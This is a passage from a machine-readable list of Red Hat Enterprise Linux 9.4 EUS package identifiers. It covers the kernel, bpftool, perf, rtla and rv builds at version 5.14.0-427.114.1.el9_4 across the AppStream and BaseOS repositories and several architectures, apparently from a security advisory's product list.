"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
